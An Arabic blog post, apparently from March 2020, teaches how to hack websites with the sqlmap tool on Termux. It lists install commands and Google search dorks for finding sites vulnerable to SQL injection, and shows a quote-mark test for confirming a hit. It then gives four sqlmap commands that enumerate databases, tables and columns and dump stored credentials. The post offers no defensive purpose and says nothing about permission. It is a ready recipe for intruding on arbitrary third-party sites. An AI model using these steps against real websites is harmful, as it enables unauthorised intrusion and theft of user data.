الأحد، 22 مارس 2020

أختراق المواقع بأداة sqlmap: عبر اداة Termux

اليوم شرحنا عن أداة sqlmap


  • تعريفها : هي أداة مخصصة لأختراق المواقع المصابة يثغرة SQL اي يمكن أختراقها عن طريق هذه الأداة ..
  • الأوامر :
  1. git clone https://github.com/sqlmapproject/sqlmap
  2. cd sqlmap 
  3. ls
  4. chmod +x sqlmap.py
  5. pyhthon2 sqlmap.py
  • عندما تفتح الاداة تحتاج اولا الى دوركات اي الى نهايات الموقع ..
  • اي عندما تخترق هذا النوع من المواقع يجب ان تكون نهايته على الشكل التالي وتسمى دوركات(Dork) :
  • دوركات: 
  • Dork
  • ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  • "page.php?id="
  • "trainers.php?id="
  • "article.php?ID="
  • "games.php?id="
  • "newsDetail.php?id="
  • "staff.php?id="
  • "products.php?id="
  • "news_view.php?id="
  • "opinions.php?id="
  • "pages.php?id="
  • "prod_detail.php?id="
  • لأيجاد موقع مصاب يجب عليك ان تنسخ احد الدوركات وتكتبه في بحث  Google وستظهر عدة مواقع ..لتعرف اي واحدة منها مصابة يجب ان تنسخ رابط الموقع وتكتب بعده هذه النقطة( ’ ) اذا ظهرت لك رسالة ما او شاشة بيضاء فيها كتابة على شكل مشفر فيكون هنا النوقع مصاب ...
  • لبدء الأختراق: 
  • تنسخ رابط الموقع المراد اختراقه ..وتكتب هذه الاوامر ...

الخطوة الأولى:
python2 sqlmap.py -u (websaite) --dbs s-- level=3 --risk=3 --batch
_________________________________________
الخطوة الثانية:
python2 sqlmap.py -u (website) -D (name_dataase) --tables --level=3 --risk=3 --batch
__________________________________________
الخطوة الثالثة:
python2 sqlmap.py -u (websit) -D (NAME_database) -T (name_table) --columns --level=3 --risk=3 --batch
__________________________________________
الخطوة الرابعة والأخيرة :
python2 sqlmap.py -u (websit) -D (NAME_database) -T (NAME_table) -C (NAME_column) --dump --level=3 --risk=3 --batch

----------------------------------------------------------------
ملاحظة: مكان كلمة ( (websit) تضع رابط الموقع
ومكان كلمة (datsbases) تنسخ الاسم الذي يظهر في قائمة database وعند اكمال جميع الخطوات سيتم اظهار الاسم والكلمة